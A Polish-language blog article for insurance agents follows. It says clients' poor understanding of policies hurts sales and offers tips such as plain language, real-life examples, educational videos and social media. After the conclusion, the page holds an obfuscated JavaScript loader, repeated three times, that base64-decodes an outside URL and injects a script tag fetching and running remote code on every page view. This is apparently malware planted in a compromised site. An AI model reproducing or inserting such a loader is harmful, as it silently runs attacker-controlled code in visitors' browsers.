Zawód agenta ubezpieczeniowego jest związany z usługami, które są trudne do zobaczenia i dotknięcia. Dlatego, brak zrozumienia produktu przez klienta może mieć duży wpływ na sprzedaż. Według książki “The Challenger Sale” autorstwa Brenta Adamsona i Matthew Dixona, jednym z najważniejszych czynników, które przeszkadzają w sprzedaży, jest brak zrozumienia ze strony klienta, tego jak produkt może pomóc mu rozwiązać jego problemy.
Zastanówmy się nad tym, czy brak zrozumienia polisy ubezpieczeniowej przez klienta rzeczywiście wpływa na sprzedaż. Wyobraź sobie, że idziesz do biura ubezpieczeń, aby kupić polisę, ale nie rozumiesz dokładnie, na czym polega ochrona ani jakie są jej warunki i jak to ubezpieczenie może Ci pomóc, czy jakie problemy może rozwiązać. Nie wiedząc tego, prawdopodobnie zrezygnujesz z zakupu, prawda? Tak samo zareagują Twoi klienci.
W książce “Influence: The Psychology of Persuasion” autorstwa Roberta Cialdiniego czytamy, że “ludzie mają większe prawdopodobieństwo podjęcia określonej decyzji, gdy rozumieją przyczyny stojące za nią” (Cialdini, 2006). To oznacza, że jeśli klienci nie rozumieją danego ubezpieczenia, trudniej będzie im podjąć decyzję o jej wyborze.
Warto zastanowić się, jak temu zaradzić. Na podstawie wielu doświadczeń możemy skupić się na kilku wskazówkach:
- Prosty i zrozumiały przekaz: Twórz materiały informacyjne, które będą łatwe do zrozumienia. Stosuj język prosty, unikaj skomplikowanych terminów ubezpieczeniowych i staraj się przekazać informacje w sposób przystępny dla każdego.
- Wykorzystuj materiały dostosowane do percepcji klienta: Krótkie filmy opowiadające o ubezpieczeniach w prosty sposób, przystępne ulotki, wpisy na blogach.
- Przykłady z życia: Pokaż, jak Twoje ubezpieczenie działa w praktyce. Wykorzystaj historie klientów, studia przypadków czy opisy sytuacji, aby pomóc klientom lepiej zrozumieć, jak Twoja polisa rozwiązuje ich problemy. Możesz o tym opowiadać lub przekazywać w postaci filmów produktowych.
- Wykorzystaj edukację: Prowadź klientów na blogi i materiały edukacyjne w sieci, które pomogą klientom zrozumieć Twoją ofertę ubezpieczeniową oraz jej korzyści. Przy okazji możesz budować swoją pozycję jako eksperta w dziedzinie ubezpieczeń.
- Edukacja przez media społecznościowe: Stwórz funpage na Fasebook, Instagram, czy Twitter i dziel się tam swoją wiedzą. Masz jej mnóstwo, więc to nie będzie trudne, a klienci to docenią i będą się stawać bardziej świadomi
- Odpowiedź na pytania: Bądź dostępny, aby odpowiedzieć na pytania klientów i wyjaśnić wszelkie wątpliwości. Im więcej wiedzą o Twojej polisie ubezpieczeniowej, tym większe prawdopodobieństwo, że zdecydują się na jej zakup.
- Personalizacja komunikacji: Dostosuj swoje przekazy do różnych grup docelowych, aby każdy klient czuł, że rozwiązujesz jego konkretne problemy. To pomoże im lepiej zrozumieć, dlaczego Twoja propozycja jest dla nich odpowiednia.
- Ucz się jak rozmawiać z klientami, czytaj dobre książki edukacyjne. Brak rozumienia produktu przez klienta jest jednym z częstszych przypadków nie podejmowania zakupu przez klienta.
Brak zrozumienia ubezpieczenia przez klienta ma zdecydowany wpływ na sprzedaż. Aby temu zaradzić, warto skupić się na prostym i zrozumiałym przekazie, pokazywać przykłady z życia, edukować klientów, używań nowoczesnych rozwiązań dopasowanych do klienta, odpowiadać na pytania i personalizować komunikację. W ten sposób możemy pomóc naszym klientom lepiej zrozumieć oferowane przez nas ubezpieczenia i przekonać ich do zakupu.
(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();